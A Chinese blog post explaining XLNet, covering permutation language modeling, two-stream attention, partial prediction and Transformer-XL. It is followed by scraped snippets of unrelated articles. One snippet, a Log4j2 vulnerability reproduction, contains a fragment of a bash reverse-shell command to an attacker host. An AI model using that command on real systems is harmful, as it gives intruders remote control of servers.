林楚海

XLNet原理介绍

1. 引言

前面介绍了ELMo、BERT、CSE等语言模型，这些语言模型在很多下游NLP任务上都取得了不错的成绩，根据他们的目标函数和模型的结构，可以大致将这些模型分为两大类，即自回归模型（autoregressive，AR）和自编码模型（autoencoding，AE）。对于给定的一个文本序列 $\mathbf{x}=\left(x_{1}, \cdots, x_{T}\right)$ ，AR模型主要是通过每个token的前文或后文进行预测，最后将每个时间步的概率进行连乘作为模型的目标函数，即 $p(\mathbf{x})=\prod_{t=1}^{T} p\left(x_{t} | \mathbf{x}_{<t}\right)$ 或者 $p(\mathbf{x})=\prod_{t=T}^{1} p\left(x_{t} | \mathbf{x}>t\right)$ ，比如ELMo模型、CSE模型、Transformer XL模型等。而AE模型则通过对原句子进行破坏，并希望通过模型来对原句子进行重建，比如BERT模型，通过随机选择15%的tokens进行mask，然后希望模型将这部分被mask掉的token重新预测出来。

对于这两种类型的模型，其实都有各自的优缺点，AR模型由于只考虑单向的文本信息，忽略了很多文本任务需要综合双向的上下文信息的事实。而AE模型虽然考虑了双向的上下文信息，但是由于在预训练时，对预测词汇替换为[MASK]，而[MASK]这个特殊词汇在下游NLP任务中是不会真实存在的，因此，会导致预训练和fine-tuning阶段存在差异。另一方面，BERT假设被预测的词汇之间是独立的，这明显有悖于语言的长依赖特性。

因此，为了克服AR模型和AE模型的缺点，2019年CMU和谷歌大脑提出了一个新的语言模型，即XLNet，该模型通过引入随机排序的思想，充分发挥了AR模型和AE模型的优点。

论文地址：《XLNet: Generalized Autoregressive Pretraining for Language Understanding》

2. XLNet原理介绍

2.1 Permutation Language Modeling

XLNet通过随机排序的思想，来解决AR模型无法引入双向文本信息的缺点，对于一个长度为 $T$ 的序列 $x$ ，其排列的方式有 $T!$ 种，因此，当模型从不同的排序中进行学习时，将可以学到双向的文本信息。令 $\mathcal{Z}_{T}$ 表示长度为 $T$ 的序列的所有排列方式的集合， $z_{t}$ 、 $\mathbf{z}<t$ 表示排列 $\mathbf{z} \in \mathcal{Z}_{T}$ 的第 $t$ 个元素和前 $t - 1$ 个元素。则此时XLNet的目标函数表达如下：
$\max _{\theta} \quad \mathbb{E}_{\mathbf{z} \sim \mathcal{Z}_{T}}\left[\sum_{t=1}^{T} \log p_{\theta}\left(x_{z_{t}} | \mathbf{x}_{\mathbf{z}<t}\right)\right]$

需要注意的是，此时的随机排序只是对序列中每个位置的序号进行随机排序，排序后，每个词汇前面的词汇都可以用于预测其概率，这里前面的词汇可能来自于原句子中当前词汇前面的词汇，也可能来自其后面的词汇，因此，相当于看到了双向的序列信息。

如下图所示，假设对于原始的顺序[1,2,3,4]，随机排列后变成[3,2,4,1]，则此时在计算3的概率时，是看不到[2,4,1]的信息的，但是在预测2时，则可以看到3的信息，在实际的计算中，通过mask的技巧来表现这种随机排列的顺序。

2.2 Two-Stream Self-Attention

但是，如果只是通过随机排序，然后利用Transformer进行训练，则会出现一个目标模糊的问题。可以来看一个例子，假设我们现在要计算第 $t$ 个位置的概率 $p_{\theta}\left(X_{z_{t}} | \mathbf{x}_{\mathbf{z}<t}\right)$ ，其表达式如下：
$p_{\theta}\left(X_{z_{t}}=\right.\left.x | \mathbf{x}_{\mathbf{z}<t}\right)=\frac{\exp \left(e(x)^{\top} h_{\theta}\left(\mathbf{x}_{\mathbf{z}}<t\right)\right)}{\sum_{x^{\prime}} \exp \left(e\left(x^{\prime}\right)^{\top} h_{\theta}\left(\mathbf{x}_{\mathbf{z}}<t\right)\right)}$

其中， $h_{\theta}\left(\mathbf{x}_{\mathbf{z}_{<} t}\right)$ 表示Transformer计算得到的 $\mathbf{X}_{\mathbf{Z}<t}$ 隐藏向量， $e (x)$ 表示词汇的embedding向量，此时， $h_{\theta}\left(\mathbf{x}_{\mathbf{z}_{<} t}\right)$ 包含的是前面 $t - 1$ 个位置的序列信息，与要预测的 $t$ 位置独立，假设此时有两个不同的排序 $\mathbf{z}^{(1)}$ 和 $\mathbf{z}^{(2)}$ ，满足以下的关系：
$\mathbf{z}_{<t}^{(1)}=\mathbf{z}_{<t}^{(2)}=\mathbf{z}_{<t} \quad \text { but } \quad z_{t}^{(1)}=i \neq j=z_{t}^{(2)}$

也就是说两个排序前 $t - 1$ 个位置完全一样，但是第 $t$ 个位置不一样，那么，此时对 $t$ 时刻计算概率分布时，有：
$\underbrace{p_{\theta}\left(X_{i}=x | \mathbf{x}_{\mathbf{z}<t}\right)}_{z_{t}^{(1)}=i, \mathbf{z}_{<t}^{(1)}=\mathbf{z}<t}=\underbrace{p_{\theta}\left(X_{j}=x | \mathbf{x}_{\mathbf{z}<t}\right)}_{z_{t}^{(1)}=j, \mathbf{z}_{<t}^{(2)}=\mathbf{z}<t}=\frac{\exp \left(e(x)^{\top} h\left(\mathbf{x}_{\mathbf{z}<t}\right)\right)}{\sum_{x^{\prime}} \exp \left(e\left(x^{\prime}\right)^{\top} h\left(\mathbf{x}_{\mathbf{z}<t}\right)\right)}$

即原本序列中第 $i$ 和第 $j$ 个位置此时预测出来的结果会完全一致，这就会导致模型的目标变得模糊不清，没法收敛，为了克服这个问题，应该让目标函数也包含 $t$ 时刻的位置信息，因此，可以将目标函数改为如下：
$p_{\theta}\left(X_{z_{t}}=x | \mathbf{x}_{z_{<t}}\right)=\frac{\exp \left(e(x)^{\top} g_{\theta}\left(\mathbf{x}_{\mathbf{z}<t}, z_{t}\right)\right)}{\sum_{x^{\prime}} \exp \left(e\left(x^{\prime}\right)^{\top} g_{\theta}\left(\mathbf{x}_{\mathbf{z}<t}, z_{t}\right)\right)}$

其中， $g_{\theta}\left(\mathbf{x}_{\mathbf{z}<t}, z_{t}\right)$ 是一种新的计算，引入了 $z_{t}$ 作为输入。

但是， $g_{\theta}\left(\mathbf{x}_{\mathbf{z}<t}, z_{t}\right)$ 具体应该怎么计算呢？当我们预测 $x_{z_{t}}$ 时， $g_{\theta}\left(\mathbf{x}_{\mathbf{z}<t}, z_{t}\right)$ 应该包含位置 $z_{t}$ 的信息，但是不能包含 $x_{z_{t}}$ 的内容信息，当预测 $x_{z_{j}}$ ，其中 $j > t$ 时，此时 $g_{\theta}\left(\mathbf{x}_{\mathbf{z}<t}, z_{t}\right)$ 可以包含 $x_{z_{t}}$ 的内容信息。为了解决这个问题，作者在Transformer的每个位置采用了两个隐藏向量来表示，即Two-Stream Self-Attention。具体如下：

content representation $h_{\theta}\left(\mathbf{x}_{\mathbf{z}_{ \leq} t}\right)$ ：简写为 $h_{z_{t}}$ ，这个隐藏向量的计算方式与原先Transformer的隐藏向量的计算方式一致，不仅包含了上下文信息，也包含了词汇 $x_{x_{t}}$ 本身的内容信息。
query representation $g_{\theta}\left(\mathbf{x}_{\mathbf{z}<t}, z_{t}\right)$ ：简写为 $g_{z_{t}}$ ，这个隐藏向量的计算则只包含了上下文信息 $\mathbf{x}_{\mathbf{z}<t}$ 和位置信息 $z_{t}$ ，但是不包含 $x_{x_{t}}$ 本身的内容信息。

在计算时，对于query stream的第一层，采用可训练的参数进行初始化，即 $g_{i}^{(0)}=w$ ，对于content stream的第一层，则直接采用embedding进行初始化，即 $h_{i}^{(0)}=e\left(x_{i}\right)$ ，对于每一层注意力的计算，两个stream的计算方式分别如下：

其中，Q,K,V同Transformer中的query、key、value，作者在实际训练时采用的是Transformer XL的结构。需要注意的是，这里两个stream其实参数都是共享的，只是两者的输入和mask稍微不一致，其实content stream本质只是其一个辅助计算作用，为了便于计算而已。在最后计算概率时，用最后一层的 $g_{z_{t}}^{(M)}$ 进行计算。

2.3 Partial Prediction

在实际的训练过程中，由于随机排列的原因，模型的收敛速度会非常慢，因此，为了提高模型预训练的速度，作者采用了局部预测的方法，即将目标序列随机选取一个切分点 $c$ 切分为两段，分别为 $z_{≤c}$ （non-target subsequence）和 $z_{>c}$ （target subsequence），然后只对target subsequence计算目标函数：
$\max _{\theta} \quad \mathbb{E}_{\mathbf{z} \sim \mathcal{Z}_{T}}\left[\log p_{\theta}\left(\mathbf{x}_{\mathbf{z}_{>c}} | \mathbf{x}_{\mathbf{z}_{ \leq c}}\right)\right]=\mathbb{E}_{\mathbf{z} \sim \mathcal{Z}_{T}}\left[\sum_{t=c+1}^{|\mathbf{z}|} \log p_{\theta}\left(x_{z_{t}} | \mathbf{x}_{\mathbf{z}<t}\right)\right]$

也就是说只选取1 $/ K$ 的词汇进行局部预测，其中 $|\mathbf{z}| /(|\mathbf{z}|-c) \approx K$ ，对于non-target subsequence，则只需计算其content stream即可，这样可以节省计算和存储。

2.4 Transformer-XL

由于XLNet的结构采用的Transformer XL，所以对于双流注意力的实际计算与Transformer还是有一些不同，之所以选择Transformer XL这种恶心的结构，主要原因还是因为Transformer XL就是作者们提出来的。不失一般性，假设一个长句 $s$ 可以切分为两个子句 $\tilde{\mathbf{x}}=\mathbf{s}_{1 : T}$ ， $\mathbf{x}=\mathbf{s}_{T+1 : 2 T}$ ， $\tilde{\mathbf{z}}$ 和 $z$ 分别表示 $\cdots T]$ 和 $\cdots 2 T]$ 的一种排序，基于排序 $\tilde{\mathbf{z}}$ ，我们可以获得一个子句每一层 $m$ 的content representations $\tilde{\mathbf{h}}^{(m)}$ ，将其传递给下一个子句，则下一个子句的content representations的计算如下：
$h_{z_{t}}^{(m)} \leftarrow \text { Attention }\left(\mathrm{Q}=h_{z_{t}}^{(m-1)}, \mathrm{KV}=\left[\tilde{\mathbf{h}}^{(m-1)}, \mathbf{h}_{\mathbf{z}_{ \leq t}}^{(m-1)}\right] ; \theta\right)$

具体的计算过程如下图所示：

query stream的计算也类似，具体的计算过程如下：

2.5 Relative Segment Encodings

由于很多下游NLP任务中都包含了多个句子的情况，比如问答任务，因此，XLNet也同BERT一样引入了Segment Encodings。在训练过程中，随机选择两个句子仅拼接，拼接的形式如下[A, SEP, B, SEP, CLS]，然后作为模型的输入，两个句子可能是上下文的关系，也可能完全不是上下文的关系，不过只有属于上下文关系时，上一个句子的各层的输出才能流入到下一个句子的计算中，作者在实验中也尝试像BERT一样在目标函数中加入next sentence预测，但是发现并没有什么效果，所以在XLNet-Large中直接取消了这个操作。

由于作者采用的是Transformer XL的结构，因此，在Segment Encoding时，也同样采用了相对Segment Encoding的方法，即给定一对 $i, j$ ，在原来注意力的计算基础上，添加下面一项：
$a_{i j}=\left(\mathbf{q}_{i}+\mathbf{b}\right)^{\top} \mathbf{s}_{i j}$

其中， $q_i$ 表示query vector， $b$ 是一个可训练的向量，s_{i,j}也是来自于两个可训练的向量 $s_{+}$ 和 $s_{-}$ ，当 $i, j$ 来自于同一个segment时，则 $\mathbf{s}_{i j}=\mathbf{s}_{+}$ ，否则， $\mathbf{s}_{i j}=\mathbf{s}_{-}$

3. 总结

以上就是XLNet的介绍，整体来看是非常恶心的，因此在Transformer XL的机构上引入了随机排列和双流注意力机制，因此，使得整个模型变得非常复杂。但是也正是因为XLNet充分发挥了BERT和AR模型的优点，因此导致其性能必定超越BERT，成为刷榜的新神器。总结一下：

XLNet利用随机排列的思想，使得模型可以考虑文本序列的双向信息，因此，比普遍的AR模型要更强。
XLNet的目标函数采用的AR模型的目标函数，因此，不需要像BERT那样采用MASK字符，因此，避免了预训练和训练阶段的模型差异，也剔除了被MASK词汇之间互相独立的强假设。

4×4矩阵键盘详解（STM32）辰哥单片机设计 STM32传感器教学矩阵计算机外设 stm32 嵌入式硬件单片机传感器
目录一、介绍二、传感器原理1.原理图2.工作原理介绍三、程序设计main.c文件button4_4.h文件button4_4.c文件四、实验效果五、资料获取项目分享一、介绍矩阵键盘，又称为行列式键盘，是用4条I/O线作为行线，4条I/O线作为列线组成的键盘。在行线和列线的每一个交叉点上设置一个按键，因此键盘中按键的个数是4×4个。这种行列式键盘结构能够有效地提高单片机系统中I/O口的利用率，节约单
高级驾驶辅助系统（ADAS）功能参数选型和原理及比喻方法讲解空间机器人自动驾驶
1.自适应巡航控制(ACC)原理介绍:自适应巡航控制系统使用雷达或激光雷达探测前方车辆的距离和速度，然后自动调整你的车速以保持安全距离。当前方车辆减速时，你的车速也会减慢，反之亦然。比喻讲解:想象你在高速公路上骑自行车，前面有一辆慢行的电动车。自适应巡航控制就像是你的自动调整速度的智能助手，它会根据前面电动车的速度自动调整你的骑行速度，保持适当的距离，就像骑行时你会自然跟随前面电动车的速度一样。2
大模型的实践应用29-大语言模型的RLHF(人类反馈强化学习)的具体应用与原理介绍微学AI 大模型的实践应用语言模型人工智能自然语言处理 RLHF
大家好，我是微学AI，今天给大家介绍一下大模型的实践应用29-大语言模型的RLHF(人类反馈强化学习)的具体应用与原理介绍。在当今人工智能发展的浪潮中，大语言模型（LargeLanguageModels,LLMs）凭借其强大的语言理解和生成能力，成为了研究与应用的热点。而在这股浪潮中，一种名为“基于人类反馈的强化学习”的方法脱颖而出，为大语言模型的优化和应用开辟了新的路径。本文首部分将深入浅出地介
pyflink 滚动窗口实例菜鸟社长菜鸟的大数据进阶之路大数据进阶之路 kafka big data python flink
写在前头：更多大数据相关精彩内容请进我的知识星球，每周定期更新正篇技术路线：模拟kafka生产者发送数据——>flink对kafka数据实时计算处理——>处理后的数据发送到kafka1、模拟客流数据的生产者，参考https://blog.csdn.net/qq_22611181/article/details/1199002502、flink聚合操作原理介绍，参考https://blog.csdn
智能8路灰度低调包含不哈哈开源分享 c语言学习 stm32
一传感器介绍自制8路灰度传感器，由嘉立创打板，不同于普通的红外循迹模块，这个8路灰度可以用来循迹白底黑线，也可以用来寻蓝底黑线等其他环境。并且灰度传感器，相对于红外传感器干扰小，探测距离高。且不通过电位器进行电压比较，而是通过MCU用ADC采样取得接收管电压，将此电压与之前按键保存的电压相比较(前面为大概介绍，具体使用方法在后面)。二原理介绍8路灰度，每一路由一个发光二极管和一个光敏二极管组成。灰
GD32F4xx中断点灯实验 k1184591768 单片机 stm32
中断原理介绍中断基础知识1.NVIC中断系统CortexR-M4集成了嵌套式矢量型中断控制器（NestedVectoredInterruptController（NVIC））来实现高效的异常和中断处理。NVIC实现了低延迟的异常和中断处理，以及电源管理控制NVIC：中断系统REXIT：外部中断中断系统包括外部中断，另外还有定时器中断，串口中断和DMA中断等2.EXTI外部中断EXTI(中断/事件控
ethtool如何让接口闪灯_ethtool原理介绍和解决网卡丢包排查思路 waytobethunder ethtool如何让接口闪灯
前言之前记录过处理因为LVS网卡流量负载过高导致软中断发生丢包的问题，RPS和RFS网卡多队列性能调优实践，对一般人来说压力不大的情况下其实碰见的概率并不高。这次想分享的话题是比较常见服务器网卡丢包现象排查思路，如果你是想了解点对点的丢包解决思路涉及面可能就比较广，不妨先参考之前的文章如何使用MTR诊断网络问题，对于Linux常用的网卡丢包分析工具自然是ethtool。更新历史2020年06月22
C#选择排序算法追逐时光者 C#.NET DotNetGuide编程指南排序算法 c#算法 .netcore .net
选择排序原理介绍选择排序（SelectionSort）是一种简单的排序算法，其实现原理如下：遍历待排序数组，从第一个元素开始。假设当前遍历的元素为最小值，将其索引保存为最小值索引（minIndex）。在剩余的未排序部分中，找到比当前最小值还要小的元素，并更新最小值索引。在遍历结束后，将找到的最小值与当前遍历位置的元素进行交换。重复步骤2到4，直到排序完成。C#代码实现 ///
自然语言处理NLP之中文分词和词性标注陈敬雷-充电了么-CEO兼CTO 自然语言处理
注：此文章内容均节选自充电了么创始人，CEO兼CTO陈敬雷老师的新书《自然语言处理原理与实战》（人工智能科学与技术丛书）【陈敬雷编著】【清华大学出版社】文章目录一、Python第三方库jieba（中文分词、词性标注）特点二、jieba中文分词的安装关键词抽取基于TF-IDF算法TF-IDF原理介绍基于TextRank算法的关键词抽取textRank算法原理介绍总结一、Python第三方库jieba
Qt+vue开发桌面应用程序（二）Vue部分介绍丁爸 qt web前端 vue QWebChannel html5
上一章介绍了Qt+vue开发桌面应用程序（一）Qt部分介绍，本文介绍Vue部分一、原理介绍主要是引入Qt5里面qwebchannel.js文件，再定义交互类和Qt5交互二、代码实现在Vue项目中的public目录，创建js目录，把qwebchannel.js文件复制到该目录，如图：修改qwebchannel.js文件，导出QWebChannelexportvarQWebChannel=functi
02.操作系统概述.md 夜月行者重学操作系统
文章目录2.操作系统原理介绍2.1操作系统的目标和功能2.1.1作为用户/计算机接口的操作系统2.1.2作为资源管理器的操作系统2.2操作系统发展简史2.2.1串行处理2.2.2简单批处理系统2.2.2.1从监控程序的角度来看2.2.2.2从处理器的角度来看2.2.2.3硬件层面需要进行的支持2.2.2.4运行模式的概念2.2.3多道批处理系统2.2.3.1多道批处理系统的硬件支持2.2.3.2多
二、C#选择排序算法哒哒咦哒哒·· c#排序算法数据结构算法
简介选择排序算法的基本思想是每一次从待排序的数据元素中选出最小（或最大）的一个元素，存放在序列的起始位置，然后，再从剩余未排序元素中继续寻找最小（大）元素，然后放到已排序序列的末尾。以此类推，直到全部待排序的数据元素排完。选择排序（SelectionSort）原理介绍选择排序（SelectionSort）是一种简单的排序算法，其实现原理如下：遍历待排序数组，从第一个元素开始。假设当前遍历的元素为最
【查找算法】插值查找随意石光算法 java 开发语言
文章目录一：插值查找**代码公式：intmid=left+(right-left)*(findVal-arr[left])/(arr[right]-arr[left]);**1.1基本概念1.2基本思想1.3原理介绍二：代码实现一：插值查找代码公式：intmid=left+(right-left)*(findVal-arr[left])/(arr[right]-arr[left]);1.1基本概念
Pyotrch-卷积神经网络基础组件之全连接层肆十二 Pytorch语法 cnn 人工智能神经网络
Pyotrch-卷积神经网络基础组件之全连接层关注B站查看更多手把手教学：肆十二-的个人空间-肆十二-个人主页-哔哩哔哩视频(bilibili.com)基本原理介绍卷积神经网络（CNN）中的全连接层通常出现在网络的最后几层，用于对前面层提取的特征进行加权和。在全连接层中，每个神经元都与其前一层的所有神经元进行全连接。全连接层的作用是将前面层提取的特征综合起来，形成一个一维的特征向量，以便于后续的分
USB-C 音频转接器工作原理介绍春天要来了p 单片机电脑
Type-C音频转接器：引领未来视听新纪元随着科技浪潮的推进，Type-C接口已逐渐成为电子设备的主流选择。其正反随意插、高速传输和强大功能等独特优势，使得Type-C接口在日常生活中的应用越来越广泛。而Type-C音频转接器，作为连接Type-C接口与音频设备的桥梁，正引领着音频领域迈向新的高度。本文将为您深入解读Type-C音频转接器的工作原理、特点、应用场景及其未来发展趋势。一、Type-C
《分布式系统原理介绍》要点简记猫哥灬01 分布式面试分布式
数据备份机制问题:机器宕机导致数据丢失问题解决:无状态节点则无需读取读取任何信息就可以立刻重新“可用”有状态节点可以通过读取本地存储设备中的信息或通过读取其他节点数据的方式恢复内存信息有状态是指是否是保存数据的节点序列号机制问题:消息乱序解决:给消息排号,按照版本号进行消费校验码机制问题:数据错误消息被抓包篡改解决:使用一定的校验码机制可以较为简单的检查出网络数据的错误，从而丢弃错误的数据序列号机
进程间通信IPC，管道、共享内存、消息队列、信号量原理介绍 light.849 模块知识 linux git c++IPc
目录前言知识点SystemVIPC机制POSIX标准操作系统的原语同步机制互斥锁读写锁条件变量信号量原子性与互斥性半双工通信机制全双工通信机制内存级文件ftok（）介绍用例：为什么是什么管道命令mknodmkfifo函数pipe（）mkfifo（）是什么匿名管道原理（匿名管道）管道文件管道文件的文件描述符原理（不同进程看到同一份资源）问题：0.管道文件会在进程中创建页表项嘛？1.管道也是文件，他有
淘宝下单返利是什么意思（淘宝返利原理介绍）高省APP大九
淘宝返利就是我们消费者在淘宝购物的时候通过淘宝返利软件下单可以返还佣金，达到省钱的目的。这就有人会问了，我在淘宝买东西没有返佣金。通过淘宝返利软件下单为什么有佣金返？淘宝是中国搜索电商，根据大多数人的购物习惯看的话，大多的人都是购买第一屏前几个商品，很少有人会拉到三屏以后购买，根据官方的数据显示，在淘宝第一屏购物的人数超过50%，滑动三屏以内购物的人数超过80%。这个你想想意味着什么，意味着你做电
深入理解嵌入式系统的设计与应用迷璃学妹嵌入式硬件
1.嵌入式系统的基本原理介绍嵌入式系统的定义和特点，包括小型化、低功耗、实时性等特性。讨论嵌入式系统的硬件架构和软件组成，包括处理器、存储器、输入输出接口等硬件部分，以及嵌入式操作系统、驱动程序和应用软件等软件部分。2.嵌入式系统的设计原则讨论嵌入式系统设计中的关键原则，如实时性、可靠性、低功耗、成本效益等。探讨嵌入式系统设计中的硬件和软件协同设计原则，包括如何选择合适的处理器架构、如何优化系统性
C++ vector 标准库总结泓_7e08
标准库文档：C++vector基本介绍（可以跳过，只是一些原理介绍）vector是序列容器，表示可以改变大小的数组。就像数组一样，vector为它们的元素使用连续的存储位置，这意味着它们的元素也可以使用指向其元素的常规指针上的偏移量来访问，并且与数组一样高效。但与数组不同，它们的大小可以动态变化，容器会自动处理它们的存储。在内部，vector使用动态分配的数组来存储它们的元素。这个数组可能需要重新
SAP Fiori Elements 源码分析系列：注解 UI.IsImageURL 的工作原理剖析试读版
本教程之前的文章，我们介绍了如何通过自己动手实验的方式，弄清楚SAPFioriElements应用里，Image字段的显示原理。16.SAPFioriElements应用里图片字段(Image)的显示原理介绍上面这篇文章的结论，是添加了UI.IsImageURL注解的这个字段，运行时会被FioriElements框架，渲染成Image外观的控件，如下图所示：本文我们要弄清楚的技术细节就是，当Fio
SAP Fiori Elements 应用里图片字段(Image)的显示原理介绍试读版
很多朋友向我反映，学习了一段时间的SAPFioriElements开发，但是感觉整套体系对于自己来说还是个黑盒子，很多技术点，看了SAP官方帮助文档后，觉得自己懂了，但是一旦需要自己动手做一些东西出来时，又觉得一片茫然。其实笔者自己也经历过这个过程。究其原因，还是大家对FioriElements一些技术细节没有理解，对SAP官方的知识点仅仅停留在记忆，甚至是死记硬背上面。不过没有关系，本教程笔者会
Git 基本原理介绍 Docker_ java git github python docker
简单地说，Git究竟是怎样的一个系统呢？请注意接下来的内容非常重要，若你理解了Git的思想和基本工作原理，用起来就会知其所以然，游刃有余。在学习Git时，请尽量理清你对其它版本管理系统已有的认识，如CVS、Subversion或Perforce，这样能帮助你使用工具时避免发生混淆。尽管Git用起来与其它的版本控制系统非常相似，但它在对信息的存储和认知方式上却有很大差异，理解这些差异将有助于避免使用
（十五）springboot实战——spring securtity的核心过滤器介绍厉害哥哥吖 #springboot spring boot
前言本节内容主要介绍springsecurtity安全框架的一些核心过滤器及其作用，我们都清楚springsecurtity安全框架底层是基于filter过滤器实现的，采用的是责任链的设计模式，它有一条很长的过滤器链。本次springsecurtity原理介绍使用的版本是5.6.8，不同版本之间可能略有差异。正文①WebAsyncManagerIntegrationFilter过滤器-将Secur
稳定可用科学上网VPN原理介绍 A゛孤青网络 git
请看这里VPN介绍:VPN（VirtualPrivateNetwork）的功能是通过公共网络建立一个专用的、加密的连接，使得用户在不可信的网络环境中也能安全地进行通信。VPN可以广泛应用于企业网络、家庭和个人网络，提供远程访问、数据传输加密、身份验证和匿名上网等服务。远程访问：VPN允许远程用户、分支机构、合作伙伴及供应商通过公共网络安全地与企业内部网络建立连接。数据传输加密：VPN使用隧
无人机飞控系统飞行原理介绍，旋翼无人机飞行控制技术详解创小董无人机技术无人机
旋翼飞行器是通过调节多个电机转速来改变螺旋桨转速，实现升力的变化，进而达到飞行姿态控制的目的。多旋翼飞行原理详解以四旋翼飞行器为例，飞行原理如下图所示，电机1和电机3逆时针旋转的同时，电机2和电机4顺时针旋转，因此飞行器平衡飞行时，陀螺效应和空气动力扭矩效应全被抵消。与传统的直升机相比，四旋翼飞行器的优势：各个旋翼对机身所产生的反扭矩与旋翼的旋转方向相反，因此当电机1和电机3逆时针旋转时，电机2和
python利用selenium实现大麦网抢票山森 selenium 测试工具自动化
一、selenium原理介绍Selenium是一个用于Web应用程序测试的工具。Selenium测试直接运行在浏览器中，就像真正的用户在操作一样。支持的浏览器包括IE（7,8,9,10,11），MozillaFirefox，Safari，GoogleChrome，Opera，Edge等。这个工具的主要功能包括：测试与浏览器的兼容性——测试应用程序看是否能够很好得工作在不同浏览器和操作系统之上。测试
Log4j2漏洞复现 Lend me log4j
Log4j2漏洞复现原理介绍因为Log4j2默认支持解析ldap/rmi协议，所以黑客只需构造恶意的JNDI接口，然后服务器通过log4j2解析jndi接口并调用lookup函数，使得服务器去引用黑客构造好的恶意类，从而达到getshell影响版本：log4j2.x&/dev/tcp/攻击机地址地址/攻击机端口号0>&1//由于docker容器里面没有nc，所以只能使用原生命令进行shell反弹3
道格拉斯-普克曲线简化算法 Chaoying. 数据结构计算机图形学算法
道格拉斯-普克曲线简化算法原理介绍#include#include#include#include#includeusingnamespacestd;//求point3到过point1和point2的直线的距离//点到直线距离计算公式：https://baike.baidu.com/item/%E7%82%B9%E5%88%B0%E7%9B%B4%E7%BA%BF%E8%B7%9D%E7%A6%B
Nginx基础和原理介绍会飞的大鱼吃小鱼 nginx 服务器负载均衡
一、nginx基本概念1、nginx简介nginx是一个反向代理服务器，特点是占用内存少，并发能力强，在同类的网页服务器中表现较好。nginx专门为性能优化而开发，性能是其最重要的考量，有报告表能支持高达50000并发连接数。2、nginx功能【1】反向代理正向代理：由客户端向代理指定它要访问哪个原始的服务器，然后又代理将请求转发给对应的服务器。向就是正向代理，客户端访问不了外网。反向代理：客户端
Algorithm 香水浓 java Algorithm
冒泡排序 public static void sort(Integer[] param) { for (int i = param.length - 1; i > 0; i--) { for (int j = 0; j < i; j++) { int current = param[j]; int next = param[j + 1];
mongoDB 复杂查询表达式开窍的石头 mongodb
1:count Pg: db.user.find().count(); 统计多少条数据 2:不等于$ne Pg: db.user.find({_id:{$ne:3}},{name:1,sex:1,_id:0}); 查询id不等于3的数据。 3：大于$gt $gte(大于等于) &n
Jboss Java heap space异常解决方法, jboss OutOfMemoryError : PermGen space 0624chenhong jvm jboss
转自 http://blog.csdn.net/zou274/article/details/5552630 解决办法： window->preferences->java->installed jres->edit jre 把default vm arguments 的参数设为-Xms64m -Xmx512m ----------------
文件上传下载解析相对路径不懂事的小屁孩文件上传
有点坑吧，弄这么一个简单的东西弄了一天多，身边还有大神指导着，网上各种百度着。下面总结一下遇到的问题：文件上传，在页面上传的时候，不要想着去操作绝对路径，浏览器会对客户端的信息进行保护，避免用户信息收到攻击。在上传图片，或者文件时，使用form表单来操作。前台通过form表单传输一个流到后台，而不是ajax传递参数到后台，代码如下: <form action=&
怎么实现qq空间批量点赞换个号韩国红果果 qq
纯粹为了好玩！！逻辑很简单 1 打开浏览器console；输入以下代码。先上添加赞的代码 var tools={}; //添加所有赞 function init(){ document.body.scrollTop=10000; setTimeout(function(){document.body.scrollTop=0;},2000);//加
判断是否为中文灵静志远中文
方法一： public class Zhidao { public static void main(String args[]) { String s = "sdf灭礌 kjl d{';\fdsjlk是"; int n=0; for(int i=0; i<s.length(); i++) { n = (int)s.charAt(i); if((
一个电话面试后总结 a-john 面试
今天，接了一个电话面试，对于还是初学者的我来说，紧张了半天。面试的问题分了层次，对于一类问题，由简到难。自己觉得回答不好的地方作了一下总结：在谈到集合类的时候，举几个常用的集合类，想都没想，直接说了list,map。然后对list和map分别举几个类型： list方面：ArrayList,LinkedList。在谈到他们的区别时，愣住了
MSSQL中Escape转义的使用 aijuans MSSQL
IF OBJECT_ID('tempdb..#ABC') is not null drop table tempdb..#ABC create table #ABC ( PATHNAME NVARCHAR(50) ) insert into #ABC SELECT N'/ABCDEFGHI' UNION ALL SELECT N'/ABCDGAFGASASSDFA' UNION ALL
一个简单的存储过程 asialee mysql 存储过程构造数据批量插入
今天要批量的生成一批测试数据，其中中间有部分数据是变化的，本来想写个程序来生成的，后来想到存储过程就可以搞定，所以随手写了一个，记录在此： DELIMITER $$ DROP PROCEDURE IF EXISTS inse
annot convert from HomeFragment_1 to Fragment 百合不是茶 android 导包错误
创建了几个类继承Fragment, 需要将创建的类存储在ArrayList<Fragment>中; 出现不能将new 出来的对象放到队列中,原因很简单; 创建类时引入包是:import android.app.Fragment; 创建队列和对象时使用的包是:import android.support.v4.ap
Weblogic10两种修改端口的方法 bijian1013 weblogic 端口号配置管理 config.xml
一.进入控制台进行修改 1.进入控制台: http://127.0.0.1:7001/console 2.展开左边树菜单域结构->环境->服务器-->点击AdminServer(管理) &
mysql 操作指令征客丶 mysql
一、连接mysql 进入 mysql 的安装目录； $ bin/mysql -p [host IP 如果是登录本地的mysql 可以不写 -p 直接 -u] -u [userName] -p 输入密码，回车，接连；二、权限操作［如果你很了解mysql数据库后，你可以直接去修改系统表，然后用 mysql> flush privileges; 指令让权限生效］ 1、赋权 mys
【Hive一】Hive入门 bit1129 hive
Hive安装与配置 Hive的运行需要依赖于Hadoop，因此需要首先安装Hadoop2.5.2，并且Hive的启动前需要首先启动Hadoop。 Hive安装和配置的步骤 1. 从如下地址下载Hive0.14.0 http://mirror.bit.edu.cn/apache/hive/ 2.解压hive，在系统变
ajax 三种提交请求的方法 BlueSkator Ajax jqery
1、ajax 提交请求 $.ajax({ type:"post", url : "${ctx}/front/Hotel/getAllHotelByAjax.do", dataType : "json", success : function(result) { try { for(v
mongodb开发环境下的搭建入门 braveCS 运维
linux下安装mongodb 1）官网下载mongodb-linux-x86_64-rhel62-3.0.4.gz 2）linux 解压 gzip -d mongodb-linux-x86_64-rhel62-3.0.4.gz; mv mongodb-linux-x86_64-rhel62-3.0.4 mongodb-linux-x86_64-rhel62-
编程之美-最短摘要的生成 bylijinnan java 数据结构算法编程之美
import java.util.HashMap; import java.util.Map; import java.util.Map.Entry; public class ShortestAbstract { /** * 编程之美最短摘要的生成 * 扫描过程始终保持一个[pBegin,pEnd]的range,初始化确保[pBegin,pEnd]的ran
json数据解析及typeof chengxuyuancsdn js typeof json解析
// json格式 var people='{"authors": [{"firstName": "AAA","lastName": "BBB"},' +' {"firstName": "CCC&
流程系统设计的层次和目标 comsci 设计模式数据结构 sql 框架脚本
流程系统设计的层次和目标
RMAN List和report 命令 daizj oracle list report rman
